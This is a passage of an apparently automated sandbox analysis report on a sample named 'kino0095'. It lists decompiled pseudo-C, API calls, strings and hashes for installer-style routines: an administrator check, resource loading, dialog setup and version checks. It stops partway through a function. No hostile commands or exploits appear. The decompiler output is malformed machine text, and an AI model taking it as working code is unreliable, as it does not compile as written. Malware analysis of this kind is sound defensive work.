Part of subcall function 003017EE: FreeSid.ADVAPI32(?,?,?,?,003018DD), ref: 00301883
Part of subcall function 003017EE: FreeLibrary.KERNEL32(00000000,?,?,?,003018DD), ref: 0030188A

GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 003018EB
OpenProcessToken.ADVAPI32(00000000), ref: 003018F2
GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 0030190A
GetLastError.KERNEL32 ref: 00301918
LocalAlloc.KERNEL32(00000000,?,?), ref: 0030192C
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00301944
AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00301964
EqualSid.ADVAPI32(00000004,?), ref: 0030197A
FreeSid.ADVAPI32(?), ref: 0030199C
LocalFree.KERNEL32(00000000), ref: 003019A3
CloseHandle.KERNEL32(?), ref: 003019AD

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
String ID:
API String ID: 2168512254-0
Opcode ID: d61c86fe7102d08e80376aed91715114bed4cfa8f5e680c44c530d3cc143dec3
Instruction ID: e24bc64ca4ccef2370abca178173cbdfa35f210e71138fec50cb7042f6b647ab
Opcode Fuzzy Hash: d61c86fe7102d08e80376aed91715114bed4cfa8f5e680c44c530d3cc143dec3
Instruction Fuzzy Hash: 82313071A02609AFDB22DFA5EC68ABFBBBCFF08704F50042AE545D2190D7309905CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0030468F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0030468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
				long _t4;
				void* _t11;
				CHAR* _t14;
				void* _t15;
				long _t16;

				_t14 = __ecx;
				_t11 = __edx;
				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
				_t16 = _t4;
				if(_t16 <= _a4 && _t11 != 0) {
					if(_t16 == 0) {
						L5:
						return 0;
					}
					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
					if(_t15 == 0) {
						goto L5;
					}
					__imp__memcpy_s(_t11, _a4, _t15, _t16);
					FreeResource(_t15);
					return _t16;
				}
				return _t4;
			}

0x00304699
0x0030469b
0x003046a9
0x003046af
0x003046b4
0x003046bc
0x003046f9
0x00000000
0x003046f9
0x003046d9
0x003046dd
0x00000000
0x00000000
0x003046e5
0x003046ef
0x00000000
0x003046f5
0x003046ff

APIs

FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003046A0
SizeofResource.KERNEL32(00000000,00000000,?,00302D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003046A9
FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003046C3
LoadResource.KERNEL32(00000000,00000000,?,00302D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003046CC
LockResource.KERNEL32(00000000,?,00302D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003046D3
memcpy_s.MSVCRT ref: 003046E5
FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003046EF

Strings

doza2, xrefs: 003046E4
TITLE, xrefs: 0030469D, 003046C0

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
String ID: TITLE$doza2
API String ID: 3370778649-4167907646
Opcode ID: b1d1124c4764143a0e9034f483d04f7e671493f316842349964369a22b2ebdb9
Instruction ID: 8add9ab1a7d4675b55c3ac413d31b33568b1d351908ba4720cd0a5911eb6aad9
Opcode Fuzzy Hash: b1d1124c4764143a0e9034f483d04f7e671493f316842349964369a22b2ebdb9
Instruction Fuzzy Hash: DA012D722427087BE31217A5BC1CF2B3E2CDBC6F52F050015FB49871C0D9B28D4082B2

Uniqueness

Uniqueness Score: -1.00%

Function 0030681F Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 81
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0030681F(void* __ebx) {
				signed int _v8;
				char _v20;
				struct _OSVERSIONINFOA _v168;
				void* _v172;
				int* _v176;
				int _v180;
				int _v184;
				void* __edi;
				void* __esi;
				signed int _t19;
				long _t31;
				signed int _t35;
				void* _t36;
				intOrPtr _t41;
				signed int _t44;

				_t36 = __ebx;
				_t19 =  *0x308004; // 0xcd371c79
				_v8 = _t19 ^ _t44;
				_t41 =  *0x3081d8; // 0x0
				_t43 = 0;
				_v180 = 0xc;
				_v176 = 0;
				if(_t41 == 0xfffffffe) {
					 *0x3081d8 = 0;
					_v168.dwOSVersionInfoSize = 0x94;
					if(GetVersionExA( &_v168) == 0) {
						L12:
						_t41 =  *0x3081d8; // 0x0
					} else {
						_t41 = 1;
						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
							goto L12;
						} else {
							_t31 = RegQueryValueExA(_v172, 0x301140, 0,  &_v184,  &_v20,  &_v180);
							_t43 = _t31;
							RegCloseKey(_v172);
							if(_t31 != 0) {
								goto L12;
							} else {
								_t40 =  &_v176;
								if(E003066F9( &_v20,  &_v176) == 0) {
									goto L12;
								} else {
									_t35 = _v176 & 0x000003ff;
									if(_t35 == 1 || _t35 == 0xd) {
										 *0x3081d8 = _t41;
									} else {
										goto L12;
									}
								}
							}
						}
					}
				}
				_t18 =  &_v8; // 0x30463b
				return E00306CE0(_t41, _t36,  *_t18 ^ _t44, _t40, _t41, _t43);
			}

0x0030681f
0x0030682a
0x00306831
0x00306836
0x0030683c
0x0030683e
0x00306848
0x00306851
0x0030685d
0x00306864
0x00306876
0x0030693a
0x0030693a
0x0030687c
0x0030687e
0x00306885
0x00000000
0x003068d6
0x003068f4
0x00306900
0x00306902
0x0030690a
0x00000000
0x0030690c
0x0030690c
0x0030691c
0x00000000
0x0030691e
0x00306924
0x0030692b
0x00306932
0x00000000
0x00000000
0x00000000
0x0030692b
0x0030691c
0x0030690a
0x00306885
0x00306876
0x00306940
0x00306951

APIs

GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0030686E
GetSystemMetrics.USER32(0000004A), ref: 003068A7
RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 003068CC
RegQueryValueExA.ADVAPI32(?,00301140,00000000,?,?,0000000C), ref: 003068F4
RegCloseKey.ADVAPI32(?), ref: 00306902

Part of subcall function 003066F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,0030691A), ref: 00306741

Strings

;F0, xrefs: 00306940
Control Panel\Desktop\ResourceLocale, xrefs: 003068C2

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
String ID: ;F0$Control Panel\Desktop\ResourceLocale
API String ID: 3346862599-1257904277
Opcode ID: 2f398e5150740f2ce086651012af0deaba673e5581213e69ea211e46656d27b2
Instruction ID: 827a296038f3d01561936a171cab67504079626c9235eb671966ca7544de6c45
Opcode Fuzzy Hash: 2f398e5150740f2ce086651012af0deaba673e5581213e69ea211e46656d27b2
Instruction Fuzzy Hash: 71318431A023289FDB33CB11DC26BAA777CEF85718F0101A6E989A6584DB309D95CF56

Uniqueness

Uniqueness Score: -1.00%

Function 003017EE Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 71
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E003017EE(intOrPtr* __ecx) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				_Unknown_base(*)()* _v20;
				void* _v24;
				intOrPtr* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t14;
				_Unknown_base(*)()* _t20;
				long _t28;
				void* _t35;
				struct HINSTANCE__* _t36;
				signed int _t38;
				intOrPtr* _t39;

				_t14 =  *0x308004; // 0xcd371c79
				_v8 = _t14 ^ _t38;
				_v12 = 0x500;
				_t37 = __ecx;
				_v16.Value = 0;
				_v28 = __ecx;
				_t28 = 0;
				_t36 = LoadLibraryA("advapi32.dll");
				if(_t36 != 0) {
					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
					_v20 = _t20;
					if(_t20 != 0) {
						 *_t37 = 0;
						_t28 = 1;
						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
							_t37 = _t39;
							 *0x30a288(0, _v24, _v28);
							_v20();
							if(_t39 != _t39) {
								asm("int 0x29");
							}
							FreeSid(_v24);
						}
					}
					FreeLibrary(_t36);
				}
				return E00306CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
			}

0x003017f6
0x003017fd
0x00301805
0x0030180b
0x0030180d
0x00301815
0x00301818
0x00301820
0x00301824
0x0030182c
0x00301832
0x00301837
0x00301851
0x00301854
0x0030185d
0x00301862
0x0030186c
0x00301872
0x00301877
0x0030187e
0x0030187e
0x00301883
0x00301883
0x0030185d
0x0030188a
0x0030188a
0x003018a2

APIs

LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,003018DD), ref: 0030181A
GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0030182C
AllocateAndInitializeSid.ADVAPI32(003018DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,003018DD), ref: 00301855
FreeSid.ADVAPI32(?,?,?,?,003018DD), ref: 00301883
FreeLibrary.KERNEL32(00000000,?,?,?,003018DD), ref: 0030188A

Strings

advapi32.dll, xrefs: 00301810
CheckTokenMembership, xrefs: 00301826

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: FreeLibrary$AddressAllocateInitializeLoadProc
String ID: CheckTokenMembership$advapi32.dll
API String ID: 4204503880-1888249752
Opcode ID: 18b0ffb6b401d23706f2f6ba7c3f7a31cc8b5cbe618fb39bd74b68f96d8e54c7
Instruction ID: cd5a4ac88459ada0ab7ff1ca15a48dfe5303347c64512d8be83f121b51de0751
Opcode Fuzzy Hash: 18b0ffb6b401d23706f2f6ba7c3f7a31cc8b5cbe618fb39bd74b68f96d8e54c7
Instruction Fuzzy Hash: 4F118671E02309AFDB169FA4EC59ABEBB7CEF44701F11456AFA05E3290DB709D048B91

Uniqueness

Uniqueness Score: -1.00%

Function 00303450 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00303450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t7;
				void* _t11;
				struct HWND__* _t12;
				int _t22;
				struct HWND__* _t24;

				_t7 = _a8 - 0x10;
				if(_t7 == 0) {
					EndDialog(_a4, 2);
					L11:
					return 1;
				}
				_t11 = _t7 - 0x100;
				if(_t11 == 0) {
					_t12 = GetDesktopWindow();
					_t24 = _a4;
					E003043D0(_t24, _t12);
					SetWindowTextA(_t24, "doza2");
					SetDlgItemTextA(_t24, 0x838,  *0x309404);
					SetForegroundWindow(_t24);
					goto L11;
				}
				if(_t11 == 1) {
					_t22 = _a12;
					if(_t22 < 6) {
						goto L11;
					}
					if(_t22 <= 7) {
						L8:
						EndDialog(_a4, _t22);
						return 1;
					}
					if(_t22 != 0x839) {
						goto L11;
					}
					 *0x3091dc = 1;
					goto L8;
				}
				return 0;
			}

0x00303459
0x0030345c
0x003034d8
0x003034de
0x00000000
0x003034e0
0x0030345e
0x00303463
0x0030349a
0x003034a0
0x003034a7
0x003034b2
0x003034c4
0x003034cb
0x00000000
0x003034cb
0x00303468
0x0030346e
0x00303474
0x00000000
0x00000000
0x0030347c
0x0030348c
0x00303490
0x00000000
0x00303496
0x00303484
0x00000000
0x00000000
0x00303486
0x00000000
0x00303486
0x00000000

APIs

EndDialog.USER32(?,?), ref: 00303490
GetDesktopWindow.USER32 ref: 0030349A
SetWindowTextA.USER32(?,doza2), ref: 003034B2
SetDlgItemTextA.USER32(?,00000838), ref: 003034C4
SetForegroundWindow.USER32(?), ref: 003034CB
EndDialog.USER32(?,00000002), ref: 003034D8

Strings

doza2, xrefs: 003034AC

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: Window$DialogText$DesktopForegroundItem
String ID: doza2
API String ID: 852535152-612509477
Opcode ID: 251cf2d559ae6f0a67bf52edd34e10c8121d8655962906610968bab6e33c6c95
Instruction ID: f9c77463e2fcde850ad4ae32bacd9b93634a995ba932e1eed29917216696c704
Opcode Fuzzy Hash: 251cf2d559ae6f0a67bf52edd34e10c8121d8655962906610968bab6e33c6c95
Instruction Fuzzy Hash: 8401B131243614ABC71B5F6AEC3CA6D3A6CEB09700F024012FA468E9E1CB708F41CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00302AAC Relevance: 12.1, APIs: 8, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00302AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				int _t21;
				char _t32;
				intOrPtr _t34;
				char* _t38;
				char _t42;
				char* _t44;
				CHAR* _t52;
				intOrPtr* _t55;
				CHAR* _t59;
				void* _t62;
				CHAR* _t64;
				CHAR* _t65;
				signed int _t66;

				_t60 = __edx;
				_t16 =  *0x308004; // 0xcd371c79
				_t17 = _t16 ^ _t66;
				_v8 = _t16 ^ _t66;
				_t65 = _a4;
				_t44 = __edx;
				_t64 = __ecx;
				if( *((char*)(__ecx)) != 0) {
					GetModuleFileNameA( *0x309a3c,  &_v268, 0x104);
					while(1) {
						_t17 =  *_t64;
						if(_t17 == 0) {
							break;
						}
						_t21 = IsDBCSLeadByte(_t17);
						 *_t65 =  *_t64;
						if(_t21 != 0) {
							_t65[1] = _t64[1];
						}
						if( *_t64 != 0x23) {
							L19:
							_t65 = CharNextA(_t65);
						} else {
							_t64 = CharNextA(_t64);
							if(CharUpperA( *_t64) != 0x44) {
								if(CharUpperA( *_t64) != 0x45) {
									if( *_t64 == 0x23) {
										goto L19;
									}
								} else {
									E00301680(_t65, E003017C8(_t44, _t65),  &_v268);
									_t52 = _t65;
									_t14 =  &(_t52[1]); // 0x2
									_t60 = _t14;
									do {
										_t32 =  *_t52;
										_t52 =  &(_t52[1]);
									} while (_t32 != 0);
									goto L17;
								}
							} else {
								E003065E8( &_v268);
								_t55 =  &_v268;
								_t62 = _t55 + 1;
								do {
									_t34 =  *_t55;
									_t55 = _t55 + 1;
								} while (_t34 != 0);
								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
								if(_t38 != 0 &&  *_t38 == 0x5c) {
									 *_t38 = 0;
								}
								E00301680(_t65, E003017C8(_t44, _t65),  &_v268);
								_t59 = _t65;
								_t12 =  &(_t59[1]); // 0x2
								_t60 = _t12;
								do {
									_t42 =  *_t59;
									_t59 =  &(_t59[1]);
								} while (_t42 != 0);
								L17:
								_t65 =  &(_t65[_t52 - _t60]);
							}
						}
						_t64 = CharNextA(_t64);
					}
					 *_t65 = _t17;
				}
				return E00306CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
			}

0x00302aac
0x00302ab7
0x00302abc
0x00302abe
0x00302ac3
0x00302ac6
0x00302ac9
0x00302ace
0x00302ae6
0x00302bdc
0x00302bdc
0x00302be0
0x00000000
0x00000000
0x00302af2
0x00302afc
0x00302b00
0x00302b05
0x00302b05
0x00302b0b
0x00302bca
0x00302bd1
0x00302b11
0x00302b18
0x00302b26
0x00302b99
0x00302bc8
0x00000000
0x00000000
0x00302b9b
0x00302bae
0x00302bb3
0x00302bb5
0x00302bb5
0x00302bb8
0x00302bb8
0x00302bba
0x00302bbb
0x00000000
0x00302bb8
0x00302b28
0x00302b2e
0x00302b33
0x00302b39
0x00302b3c
0x00302b3c
0x00302b3e
0x00302b3f
0x00302b55
0x00302b5d
0x00302b64
0x00302b64
0x00302b7a
0x00302b7f
0x00302b81
0x00302b81
0x00302b84
0x00302b84
0x00302b86
0x00302b87
0x00302bbf
0x00302bc1
0x00302bc1
0x00302b26
0x00302bda
0x00302bda
0x00302be6
0x00302be6
0x00302bf8

APIs

GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00302AE6
IsDBCSLeadByte.KERNEL32(00000000), ref: 00302AF2
CharNextA.USER32(?), ref: 00302B12
CharUpperA.USER32 ref: 00302B1E
CharPrevA.USER32(?,?), ref: 00302B55
CharNextA.USER32(?), ref: 00302BD4

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
String ID:
API String ID: 571164536-0
Opcode ID: 2134245634db9ad1ba30f99eb42f106bdc4da2690a934439ac0015224e95a064
Instruction ID: b2c921b503d6da8fe4f0afd8b433274de65e6d12a9f71ae542c519c537991abe
Opcode Fuzzy Hash: 2134245634db9ad1ba30f99eb42f106bdc4da2690a934439ac0015224e95a064
Instruction Fuzzy Hash: DC41273450A2455FDB1B9F349C78AFE7BAD9F56300F14009AE8C297282DF754E46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 003028E8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 140
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E003028E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
				void* _v8;
				char* _v12;
				intOrPtr _v16;
				void* _v20;
				intOrPtr _v24;
				int _v28;
				char _v32;
				void* _v36;
				int _v40;
				void* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				long _t68;
				void* _t70;
				void* _t73;
				void* _t79;
				void* _t83;
				void* _t87;
				void* _t88;
				intOrPtr _t93;
				intOrPtr _t97;
				intOrPtr _t99;
				int _t101;
				void* _t103;
				void* _t106;
				void* _t109;
				void* _t110;

				_v12 = __edx;
				_t99 = __ecx;
				_t106 = 0;
				_v16 = __ecx;
				_t87 = 0;
				_t103 = 0;
				_v20 = 0;
				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
					L19:
					_t106 = 1;
				} else {
					_t62 = 0;
					_v8 = 0;
					while(1) {
						_v24 =  *((intOrPtr*)(_t99 + 0x80));
						if(E00302773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
							goto L20;
						}
						_t11 =  &_v32; // 0x303938
						_t68 = GetFileVersionInfoSizeA(_v12, _t11);
						_v28 = _t68;
						if(_t68 == 0) {
							_t99 = _v16;
							_t70 = _v8 + _t99;
							_t93 = _v24;
							_t87 = _v20;
							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
								goto L18;
							}
						} else {
							_t103 = GlobalAlloc(0x42, _t68);
							if(_t103 != 0) {
								_t73 = GlobalLock(_t103);
								_v36 = _t73;
								if(_t73 != 0) {
									_t16 =  &_v32; // 0x303938
									if(GetFileVersionInfoA(_v12,  *_t16, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
										L15:
										GlobalUnlock(_t103);
										_t99 = _v16;
										L18:
										_t87 = _t87 + 1;
										_t62 = _v8 + 0x3c;
										_v20 = _t87;
										_v8 = _v8 + 0x3c;
										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
											continue;
										} else {
											goto L19;
										}
									} else {
										_t79 = _v44;
										_t88 = _t106;
										_v28 =  *((intOrPtr*)(_t79 + 0xc));
										_t101 = _v28;
										_v48 =  *((intOrPtr*)(_t79 + 8));
										_t83 = _v8 + _v16 + _v24 + 0x94;
										_t97 = _v48;
										_v36 = _t83;
										_t109 = _t83;
										do {
											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00302A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00302A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
											_t109 = _t109 + 0x18;
											_t88 = _t88 + 4;
										} while (_t88 < 8);
										_t87 = _v20;
										_t106 = 0;
										if(_v56 < 0 || _v64 > 0) {
											if(_v52 < _t106 || _v60 > _t106) {
												GlobalUnlock(_t103);
											} else {
												goto L15;
											}
										} else {
											goto L15;
										}
									}
								}
							}
						}
						goto L20;
					}
				}
				L20:
				 *_a8 = _t87;
				if(_t103 != 0) {
					GlobalFree(_t103);
				}
				return _t106;
			}

0x003028f1
0x003028f4
0x003028f7
0x003028f9
0x003028fc
0x003028ff
0x00302901
0x00302907
0x00302a62
0x00302a64
0x0030290d
0x0030290d
0x0030290f
0x00302912
0x00302920
0x00302937
0x00000000
0x00000000
0x0030293d
0x00302944
0x0030294a
0x0030294f
0x00302a2f
0x00302a32
0x00302a34
0x00302a37
0x00302a41
0x00000000
0x00000000
0x00302955
0x0030295e
0x00302962
0x00302969
0x0030296f
0x00302974
0x0030297e
0x0030298c
0x00302a20
0x00302a21
0x00302a27
0x00302a4c
0x00302a4f
0x00302a50
0x00302a53
0x00302a56
0x00302a5c
0x00000000
0x00000000
0x00000000
0x00000000
0x003029b2
0x003029b2
0x003029b5
0x003029bd
0x003029c3
0x003029cc
0x003029d5
0x003029d7
0x003029da
0x003029dd
0x003029df
0x003029ec
0x003029f8
0x003029fc
0x003029ff
0x00302a02
0x00302a07
0x00302a0a
0x00302a0f
0x00302a19
0x00302a81
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00302a0f
0x0030298c
0x00302974
0x00302962
0x00000000
0x0030294f
0x00302912
0x00302a65
0x00302a68
0x00302a6c
0x00302a6f
0x00302a6f
0x00302a7d

APIs

GlobalFree.KERNEL32 ref: 00302A6F

Part of subcall function 00302773: CharUpperA.USER32(CD371C79,00000000,00000000,00000000), ref: 003027A8
Part of subcall function 00302773: CharNextA.USER32(0000054D), ref: 003027B5
Part of subcall function 00302773: CharNextA.USER32(00000000), ref: 003027BC
Part of subcall function 00302773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00302829
Part of subcall function 00302773: RegQueryValueExA.ADVAPI32(?,00301140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00302852
Part of subcall function 00302773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00302870
Part of subcall function 00302773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 003028A0

GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00303938,?,?,?,?,-00000005), ref: 00302958
GlobalLock.KERNEL32 ref: 00302969
GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00303938,?,?,?,?,-00000005,?), ref: 00302A21
GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00303938,?,?), ref: 00302A81

Strings

890, xrefs: 0030293D, 0030297E, 00302940

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
String ID: 890
API String ID: 3949799724-4251242540
Opcode ID: 808a8860e2fd82d63120665546e0929d53565a2413742301c91c9275954482d0
Instruction ID: dfea08ed3fa0baf2ebbe9ad78467a2b655ca946ab94b81fa28636bf73ac0f871
Opcode Fuzzy Hash: 808a8860e2fd82d63120665546e0929d53565a2413742301c91c9275954482d0
Instruction Fuzzy Hash: AD513D31E01219DFCB22DF98D898AAEFBB9FF48700F15406AE905E7251DF319941DB90

Uniqueness

Uniqueness Score: -1.00%

Function 003043D0 Relevance: 10.6, APIs: 7, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E003043D0(struct HWND__* __ecx, struct HWND__* __edx) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				int _v52;
				intOrPtr _v56;
				int _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				void* _t53;
				intOrPtr _t56;
				int _t59;
				struct HWND__* _t63;
				struct HWND__* _t67;
				struct HWND__* _t68;
				struct HDC__* _t69;
				int _t72;
				signed int _t74;

				_t63 = __edx;
				_t29 =  *0x308004; // 0xcd371c79
				_v8 = _t29 ^ _t74;
				_t68 = __edx;
				_v44 = __ecx;
				GetWindowRect(__ecx,  &_v40);
				_t53 = _v40.bottom - _v40.top;
				_v48 = _v40.right - _v40.left;
				GetWindowRect(_t68,  &_v24);
				_v56 = _v24.bottom - _v24.top;
				_t69 = GetDC(_v44);
				_v52 = GetDeviceCaps(_t69, 8);
				_v60 = GetDeviceCaps(_t69, 0xa);
				ReleaseDC(_v44, _t69);
				_t56 = _v48;
				asm("cdq");
				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
				_t67 = 0;
				if(_t72 >= 0) {
					_t63 = _v52;
					if(_t72 + _t56 > _t63) {
						_t72 = _t63 - _t56;
					}
				} else {
					_t72 = _t67;
				}
				asm("cdq");
				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
				if(_t59 >= 0) {
					_t63 = _v60;
